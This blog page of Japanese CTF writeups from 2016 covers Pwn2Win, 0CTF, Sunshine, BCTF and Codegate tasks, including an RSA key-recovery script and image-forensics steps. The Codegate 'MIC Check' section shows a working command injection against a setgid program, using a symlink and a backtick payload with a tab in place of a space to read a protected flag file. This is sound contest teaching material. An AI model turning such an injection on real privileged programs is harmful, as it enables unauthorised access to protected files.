2016年03月

Pwn2Win CTF 2016 writeup Sum (Hello World Platform)

Sum (Hello World Platform)
Points: 20
Category: Programming Like Marathons
Description:

English:


This problem is an example on how to connect to our server to read inputs and send the outputs for the programming challenges. Given a set of numbers greater than zero, followed by zero and a line break, compute the sum of these numbers. The solution for this problem is available at: https://static.pwn2win.party/solvers-example-platform.tar.gz.  All you need to do in order to obtain the flag is to execute the implementation you see more fit!


openssl s_client -connect programming.pwn2win.party:9000

ダウンロードしたファイルを解凍すると、C++、Java、Pythonで書かれたソースファイルが出来ます。
  • solve_sum.cpp
  • solve_sum.java
  • solve_sum.py
Python-2.7.9の実行環境でPythonプログラムを実行するだけで、下記のとおりフラグが表示されました。
$ /usr/local/lib/python2.7.9/bin/python solve_sum.py
received: 6 3 4 6 5 2 6 6 2 0
sent: 40
received: 8 5 2 3 1 1 9 5 9 2 0
sent: 45
received: 7 1 5 4 2 9 9 0
sent: 37
received: 6 8 4 7 3 9 5 7 9 6 6 1 8 2 2 0
sent: 83
received: 5 5 8 3 8 3 9 7 1 7 1 1 2 2 5 9 5 7 0
sent: 88
received: 5 9 9 1 3 7 3 5 4 4 2 4 6 6 6 1 0
sent: 75
received: 2 7 9 1 2 8 5 6 5 9 6 5 5 8 9 9 2 7 4 0
sent: 109
received: 7 9 7 2 2 2 9 0
sent: 38
received: 5 7 1 3 9 6 2 6 3 3 7 1 4 4 2 1 0
sent: 64
received: 5 2 2 3 2 8 1 8 0
sent: 31
received: 9 7 5 5 1 3 8 1 7 6 1 7 0
sent: 60
received: 6 7 2 9 6 8 1 0
sent: 39
received: 1 1 6 2 3 7 0
sent: 20
received: 4 7 2 5 1 5 3 4 7 7 0
sent: 45
received: 3 3 5 6 5 3 3 6 4 2 6 4 4 1 0
sent: 55
received: 1 4 7 7 7 1 5 4 5 3 0
sent: 44
received: 2 3 5 6 7 1 6 4 9 2 1 0
sent: 46
received: 8 3 6 3 2 5 6 9 6 9 2 2 3 3 9 3 4 1 4 0
sent: 88
received: 2 5 4 3 9 1 1 7 8 6 0
sent: 46
received: 9 1 6 8 2 5 5 4 8 1 0
sent: 49
received: CTF-BR{Congrats!_you_know_how_to_sum!}
フラグは、
CTF-BR{Congrats!_you_know_how_to_sum!}
です。

Pythonプロフェッショナルプログラミング 第2版
株式会社ビープラウド
秀和システム
2015-05-21


Pwn2Win CTF 2016 writeup g00d b0y

g00d b0y
Points: 10
Category: Bonus
Description:
English:
If you were a good kid, get your 10 points.
登録完了メールに記載されている以下のリンクをクリックします。

1

IMPORTANT: read carefully and calmly the information and rules.
以下のページが表示されます。このページをよく読むと、下のほうにフラグが記載されています。
no title

フラグは、
RTFM_1s_4_g00d_3xpr3ss10n_v2.0
です。



Pwn2Win CTF 2016 writeup Skycast

Skycast:
Points: 10
Category: Story
Description:
"The Club - The Power Behind the Scenes"

English:
 
It all started in the 60s and 70s when there was still hope - when there was no Project SKY-80:37...
A small number of the most senior officers from the Brazilian military were unsatisfied with the way their country was being run and decided to create a secret organisation called the "Marble Club" (the original term was born on this occasion, and was used by a presenter later). This club had two main aims; to oust the existing dictatorship and subsequently become the political leaders of the country themselves. The Mentor (sometimes known as 'Fideleeto') set up meetings which were also attended by honorary members and the intellectual elite. Those who were away participated in the meetings via telephone (being a common device at the time).
The Club's rule was absolute, freedom of expression was not allowed and censorship was a core part of their ambitious plans. With their conspiracy beginning to take shape the next task was to establish an idea to use as an excuse for their existence - to try to avoid any 'reluctance' the general population may have about a regime change. The rally cry chosen was "For the defence of national security".
In the period following the regime change, the Club attempted to exert extreme control of the media. This later became known as the "buckshot period." The people however were not so easily fooled and the saying "Brazil, Love it or leave it" became a common catchphrase. Many left the country out of despair and disgust. The "buckshot period" was deemed to be unsuccessful and so the Club started devising more effective strategies to maintain their grasp on power. The approach they settled on was reverse tactics and avoid the use of force directly against the media. Instead they decided they would create and maintain the illusion of a democracy. They declared that one of their members, a "General Peixel", would be chosen as their puppet successor who would slowly set up a pseudo-democracy in the country to placate the opposition. Taking his orders from the Club, General Peixel announced the end the existing government and that elections would be held. This was just the first step. Brazil needed to rescue their exiled talented people so an amnesty law was created. "You need educated citizens but still gullible", said Mentor at a meeting of the Club.
However, even as direct elections were already being celebrated in the streets, the Club was studying and devising ways to have the appearance of a legitimate choosing of political representatives as voted by the the people, but without losing the traditional control that already had over the country. That's when the idea arose of Electronic Ballots, which began to be studied further in the 80s.
Also in the early 80s, a group called Project SKY-80:37 was formed by students (PhD) of Brazilian universities, initially with the aim of peaceful street protests organized by BBSs. The government repression was still in effect against this type of activity so no one was willing to take a leadership role. As a result the groups overt actions were few in number. However the thirst for change country was great meetings held frequently, and a new approach emerged: using knowledge to attack the root problem.
In the 90s, after the return of direct elections, and with the a new puppet government in place, the Club met again with their advisers (including Mentor). Here is a rough translation from the meeting transcript, recorded with the help of a voice recorder created by a member of the Project and left in place the day before the meeting:
"You need to do something I never do, but it will be necessary for the course in Brazil remain in our tracks. These Electronic Booths which have proven to be reliable, that is, easy to tampering, according to reports. The big secret for the popularization is to invest in marketing, through the image that is safe".
At that meeting, the original idea of ​​media censorship was again discussed, and again this time the approach was different. The Club realized that partnering with major media outlets to filter the information that suited them would be much more effective than punishing those that dared stand up to them, and would also benefit both sides.
The electronic voting booths were deployed and media partnerships negotiated. Election after election the people were unwittingly at the mercy of the Club's wishes, seeing only what they were allowed to see, doing exactly what The Club want them to do. The only spark of hope was called Project SKY-80:37.
My friends - we are here now fighting for a decent country using the biggest weapons we have: knowledge, hacking, and courage! Thanks to many old school friends (some still are active) who formed this group, we can get up and shout our cry of freedom because we are still alive and we will not be silenced.
We still have much to learn. We had the idea of broadcasting this message. We need your help in some missions. We have a lot of 'raw'  information about the Club and its activities that still need to be 'processed' quickly in order to be useful for us, for the people of Brazil and for the establishment of a real democracy.
This message was sent by SKYcast, only a select group of hackers can read it. We welcome those privileged few. I hope you can help us.
"For every action there is a reaction, we are the resistance, and the last resort." SKYbit89

Confirm receipt of the message by sending back "CTF-BR{SKYcast_recebido_e_lido}".
 
Greetings, SKYpitain82.
最後のほうにフラグが記載されています。
フラグは、
CTF-BR{SKYcast_recebido_e_lido}
です。


VolgaCTF 2016 Quals writeup Tic-Tac-Toe

0CTF 2016 Quals writeup Checkin

Correct Flag

Flag is 0ctf{w3lC0m3_t0_0CTF_2016}

フラグは、

0ctf{w3lC0m3_t0_0CTF_2016}

です。

ハッカーの学校
IPUSIRON
データ・ハウス
2015-01-23


Sunshine CTF 2016 writeup Butterfly Effect

Butterfly Effect

50

judges: meowmeow

蝶々の画像です。

butterfly

ImageJで開いて、「Image」→「Adjust」→「Color Balance」を選択します。下図のように、Allを選択してMinimumを0→254にします。
no title

下図のようになります。
1

フラグは、
sun{RE4DY_THE_4CID_M4GNET!}
です。

ImageJではじめる生物画像解析
三浦耕太
学研プラス
2016-03-25


BCTF 2016 writeup Special RSA

Special RSA Score: 200

crypto

While studying and learning RSA, I knew a new form of encryption/decryption with the same safety as RSA.

I encrypted msg.txt and got msg.enc as an example for you.

$ python special_rsa.py enc msg.txt msg.enc

Can you recover flag.txt from flag.enc?

special_rsa.zip.f6e85b8922b0016d64b1d006529819de

ファイルを解凍すると次のファイルができます。
  • flag.enc
  • msg.enc
  • msg.txt
  • special_rsa.py
special_rsa.pyのencrypt処理より、mを平文、cを暗号文とすると、次のとおり表せます。
k ^ r * m ≡ c (mod N)
また、msg.txtよりm、msg.encよりr,cを取得することができます。実際に取得すると、2組の(m1, c1, r1)と(m2, c2, r2)を得ることができます。
c1 = 14548997380897265239778884825381301109965518989661808090688952232381091726761464959572943383024428028270717629953894592890859128818839328499002950828491521254480795364789013196240119403187073307558598496713832435709741997056117831860370227155633169019665564392649528306986826960829410120348913586592199732730933259880469229724149887380005627321752843489564984358708013300524640545437703771424168108213045567568595093421366224818609501318783680497763353618110184078118456368631056649526433730408976988014678391205055298782061128568056163894010397245301425676232126267874656710256838457728944370612289985071385621160886
m1 = 8246074182642091125578311828374843698994233243811347691229334829218700728624047916518503687366611595562099039411430662968666847086659721231623198995017758424796091810259884653332576136128144958751327844746991264667007359518181363522934430676655236880489550093852524801304612322373542296281962196795304499711006801211783005857297362930338978872451934860435597545642219213551685973208209873623909629278321181485010964460652298690058747090298312365230671723790850998541956664376820820570709272500330966205578898690396706695024001970727864091436518202414166919020415892764617055978488996164642229582717493375419993187360
r1 = 12900676191620430360427117641859547516838813596331616166760756921115466932766990479475373384324634210232168544745677888398849094363202992662466063289599443
c2 = 12793942795110038319724531875568693507469327176085954164034728727511164833335101755153514030256152878364664079056565385331901196541015393609751624971554016671160730478932343949538202167508319292084519621768851878526657022981883304260886841513342396524869530063372782511380879783246034751883691295368172069170967975561364277514063320691930900258017293871754252209727301719207692321798229276732198521711602080244950295889575423383308099786298184477668302842952215665734671829249323604032320696267130330613134368640401070775927197554082071807605399448960911234829590548855031180158567578928333030631307816223152118126597
m2 = 15575051453858521753108462063723750986386093067763948316612157946190835527332641201837062951012227815568418309166473080588354562426066694924364886916408150576082667797274000661726279871971377438362829402529682825471299861814829463510659258586020732228351258291527965822977048954720558973840956731377322516168809373640494227129998871167089589689796024458501705704779109152762373660542684880052489213039920383757930855300338529058000330103359636123251274293258
r2 = 7718975159402389617924543100113967512280131630286624078102368166185443466262861344357647019797762407935675150925250503475336639811981984126529557679881059
従って、これらの値からkを求めることができれば、flag.encを復号することができます。
さて、ここで、中国の剰余定理、整数の合同による性質を利用しkを求めます。整数の合同については、下記のサイトが分かりやすいです。
http://www2.cc.niigata-u.ac.jp/~takeuchi/tbasic/BackGround/Cong.html

2組の(m1, c1, r1)と(m2, c2, r2)について、次の式が成り立ちます。
k ^ r1 * m1 ≡ c1 (mod N)
k ^ r2 * m2 ≡ c2 (mod N)
m1とNの最大公約数が1、m2とNの最大公約数が1であるため、次のように変形できます。
k ^ r1 ≡ c1 / m1 (mod N)
k ^ r2 ≡ c2 / m2 (mod N)
合同による乗算により、次のようになります。
(k ^ r1) * (r ^ r2) ≡ (c1 / m1) * (c2 / m2) (mod N)   ・・・①
ここで、factordbr1r2について調べると、共に素数であることが分かります。
従って、r1とr2は互いに素なので、適当な整数(a,b)が存在し、
a * r1 + b * r2 = 1
が成り立ちます。式を変形して、
r2 = (1 - a * r) / b   ・・・②
②を①に代入して、いろいろ変形すると、
k ≡ (c1 / m1) ^ a * (c2 / m2) ^ b (mod N)
となります。
ここまできたら、Pythonを基盤とした数式処理システムSageMathCloudで、下記のコードにより求めます。
def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

N = 23927411014020695772934916764953661641310148480977056645255098192491740356525240675906285700516357578929940114553700976167969964364149615226568689224228028461686617293534115788779955597877965044570493457567420874741357186596425753667455266870402154552439899664446413632716747644854897551940777512522044907132864905644212655387223302410896871080751768224091760934209917984213585513510597619708797688705876805464880105797829380326559399723048092175492203894468752718008631464599810632513162129223356467602508095356584405555329096159917957389834381018137378015593755767450675441331998683799788355179363368220408879117131
c1 = 14548997380897265239778884825381301109965518989661808090688952232381091726761464959572943383024428028270717629953894592890859128818839328499002950828491521254480795364789013196240119403187073307558598496713832435709741997056117831860370227155633169019665564392649528306986826960829410120348913586592199732730933259880469229724149887380005627321752843489564984358708013300524640545437703771424168108213045567568595093421366224818609501318783680497763353618110184078118456368631056649526433730408976988014678391205055298782061128568056163894010397245301425676232126267874656710256838457728944370612289985071385621160886
m1 = 8246074182642091125578311828374843698994233243811347691229334829218700728624047916518503687366611595562099039411430662968666847086659721231623198995017758424796091810259884653332576136128144958751327844746991264667007359518181363522934430676655236880489550093852524801304612322373542296281962196795304499711006801211783005857297362930338978872451934860435597545642219213551685973208209873623909629278321181485010964460652298690058747090298312365230671723790850998541956664376820820570709272500330966205578898690396706695024001970727864091436518202414166919020415892764617055978488996164642229582717493375419993187360
r1 = 12900676191620430360427117641859547516838813596331616166760756921115466932766990479475373384324634210232168544745677888398849094363202992662466063289599443
c2 = 12793942795110038319724531875568693507469327176085954164034728727511164833335101755153514030256152878364664079056565385331901196541015393609751624971554016671160730478932343949538202167508319292084519621768851878526657022981883304260886841513342396524869530063372782511380879783246034751883691295368172069170967975561364277514063320691930900258017293871754252209727301719207692321798229276732198521711602080244950295889575423383308099786298184477668302842952215665734671829249323604032320696267130330613134368640401070775927197554082071807605399448960911234829590548855031180158567578928333030631307816223152118126597
m2 = 15575051453858521753108462063723750986386093067763948316612157946190835527332641201837062951012227815568418309166473080588354562426066694924364886916408150576082667797274000661726279871971377438362829402529682825471299861814829463510659258586020732228351258291527965822977048954720558973840956731377322516168809373640494227129998871167089589689796024458501705704779109152762373660542684880052489213039920383757930855300338529058000330103359636123251274293258
r2 = 7718975159402389617924543100113967512280131630286624078102368166185443466262861344357647019797762407935675150925250503475336639811981984126529557679881059

g, a, b = egcd(r1, r2)
k = pow((c1 / m1) % N, a, N) * pow((c2 / m2) % N, b, N)
print k
実行すると、kが求まります。
k = 175971776542095822590595405274258668271271366360140578776612582276966567082080372980811310146217399585938214712928761559525614866113821551467842221588432676885027725038849513527080849158072296957428701767142294778752742980766436072183367444762212399986777124093501619273513421803177347181063254421492621011961
kがわかりましたので、次のPythonプログラムによりflag.encより平文を求めます。
import msgpack

def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

def modinv(a, m):
    g, x, y = egcd(a, m)
    assert g == 1
    return x % m

def pad_even(x):
    return ('', '0')[len(x)%2] + x

def decrypt(c, k):
    out = ''
    for r_s, c_s in msgpack.unpackb(c):
        r = int(r_s.encode('hex'), 16)
        c = int(c_s.encode('hex'), 16)
        k_inv = modinv(k, N)
        out += pad_even(format(pow(k_inv, r, N) * c % N, 'x')).decode('hex')
    return out

N = 23927411014020695772934916764953661641310148480977056645255098192491740356525240675906285700516357578929940114553700976167969964364149615226568689224228028461686617293534115788779955597877965044570493457567420874741357186596425753667455266870402154552439899664446413632716747644854897551940777512522044907132864905644212655387223302410896871080751768224091760934209917984213585513510597619708797688705876805464880105797829380326559399723048092175492203894468752718008631464599810632513162129223356467602508095356584405555329096159917957389834381018137378015593755767450675441331998683799788355179363368220408879117131
k = 175971776542095822590595405274258668271271366360140578776612582276966567082080372980811310146217399585938214712928761559525614866113821551467842221588432676885027725038849513527080849158072296957428701767142294778752742980766436072183367444762212399986777124093501619273513421803177347181063254421492621011961
print decrypt(open("flag.enc").read(), k)
実行すると、フラグが表示されます。
フラグは、
BCTF{q0000000000b3333333333-ju57-w0n-pwn20wn!!!!!!!!!!!!}
です。




BCTF 2016 writeup catvideo

catvideo Score: 150

forensic

cat_video.mp4

ダウンロードした動画を再生すると、砂嵐様の画面が表示されます。
no title

よく見ると微妙な動きがあるので、フレームごとの画像イメージをファイルに抽出して、フレーム間の差分を取ってみます。動画から画像イメージを抽出するのにFree Video to JPG Converterを使います。
http://www.dvdvideosoft.com/products/dvd/Free-Video-to-JPG-Converter.htm

イメージを抽出したところ1922フレームありました。それでは、フレーム間の差分をとります。ImageJを使い、対象となる画像ファイルを2つ開いて「Process」→「Image Calculator」でOperationにXORを指定します。

1

次の画像は、1フレーム目と20フレーム目のXORをとった結果です。
0001xor0020

元の動画は次のようですが、これはフラグではありません。
おもちゃを咥えるとふみふみが止まらないねこ。

さらに、1フレーム目と140フレーム目の画像のXORをとります。次の画像を得ることができます。
0001xor0140

したがって、フラグは、
BCTF{cute&fat_cats_does_not_like_drinking}
です。



BCTF 2016 writeup irc

irc Score: 10

misc

Freenode(chat.freenode.net)のチャンネル#bctfに接続します。
hh:mm チャンネルに入りました
hh:mm *xxxxxx join #bctf (~xxxxxx@yyy.zzz)
hh:mm *topic : BCTF{welcome_to_BCTF2016}
フラグは、
BCTF{welcome_to_BCTF2016}
です。



Codegate CTF 2016 Quals writeup MIC Check

MIC Check

Who's in here?

ssh mic@175.119.158.131 -p11133
pw : miccheck
指定されたIPアドレス、ポートにsshで接続します。lsコマンドでファイル一覧を確認します。mic.flag.txtにフラグが書かれていると思われますが、所有者が異なるためそのままでは閲覧できません。
mic@ubuntu:~$ ls -al
total 44
drwxr-x--- 3 root mic      4096 Mar 13 09:51 .
drwxr-xr-x 6 root root     4096 Mar 13 01:32 ..
drwxr-xr-x 2 root root     4096 Mar 13 01:49 .bash_history
-rw-r--r-- 1 root root      220 Mar 13 01:07 .bash_logout
-rw-r--r-- 1 root root     3771 Mar 13 01:07 .bashrc
-rwxr-sr-x 1 root miccheck 8992 Mar 13 02:04 miccheck
-rw-r--r-- 1 root root      698 Mar 13 02:04 miccheck.c
-r--r----- 1 root miccheck   23 Mar 13 01:28 mic.flag.txt
-rw-r--r-- 1 root root      675 Mar 13 01:07 .profile
miccheck.cを確認します。
mic@ubuntu:~$ cat miccheck.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

int main( int argc, char *argv[], char **environ )
{
        char buf[12] = { 0, };
        char cmd[2048] = { 0, };
        unsigned int i = 0;

        char **e;
        size_t len;

        printf( "input path :" );
        fgets( buf, 10, stdin );

        for( i = 0; i <= 11; i++ ) {
                if( buf[i] == '\'' ) exit(0);
                if( buf[i] == '&' ) exit(0);
                if( buf[i] == ';' ) exit(0);
                if( buf[i] == '|' ) exit(0);
                if( buf[i] == '\"' ) exit(0);
                if( buf[i] == ' ' ) exit(0);
        }


        sprintf( cmd, "/bin/ls -al /dev/%s", buf );

        for( e = environ; *e; ++e ) {
                len = strlen( *e );
                memset( *e, 0x00, len );
        }

        setregid( 1003, 1003 );
        system( cmd );

        return 0;
}
同じディレクトリにあるmiccheckを実行して、コマンドインジェクションによりflagファイルの内容を表示させれば良いと思われます。ただし、10文字までしか入力できませんので、文字数を省略するために、まず、書き込み権限のあるフォルダを探して1文字のファイル名でシンボリックリンクを作成します。下記では、/dev/shmフォルダにfという名前でシンボリックリンクを作成しています。
mic@ubuntu:/dev/shm$ ln -s /home/mic/mic.flag.txt f
mic@ubuntu:/dev/shm$ ls -al
total 0
drwxrwxrwt  2 root root   60 Mar 14 01:14 .
drwxr-xr-x 19 root root 4320 Mar 14 01:03 ..
lrwxrwxrwx  1 mic  mic    22 Mar 14 01:14 f -> /home/mic/mic.flag.txt
半角スペースが使えませんので代わりにタブを使い、バッククォートでコマンドを実行させます。
mic@ubuntu:/dev/shm$ /home/mic/miccheck
input path :a`cat       f`
/bin/ls: cannot access /dev/alet: No such file or directory
/bin/ls: cannot access the: No such file or directory
/bin/ls: cannot access hacking: No such file or directory
/bin/ls: cannot access begins: No such file or directory
赤文字の部分が「cat f」コマンドの結果ですので、それをつなげて、フラグは、
let the hacking begins
になります。




記事検索
ギャラリー
  • TetCTF 2023 NewYearBot
  • UUT CTF writeup Find The Password
  • UUT CTF writeup The Puzzle
  • Hack Zone Tunisia 2019 writeup Microscope
  • Hack Zone Tunisia 2019 writeup Welcome
  • SwampCTF 2019 writeup Brokerboard
  • SwampCTF 2019 writeup Leap of Faith
  • SwampCTF 2019 writeup Last Transmission
  • CBM CTF 2019 writeup Long road
カテゴリー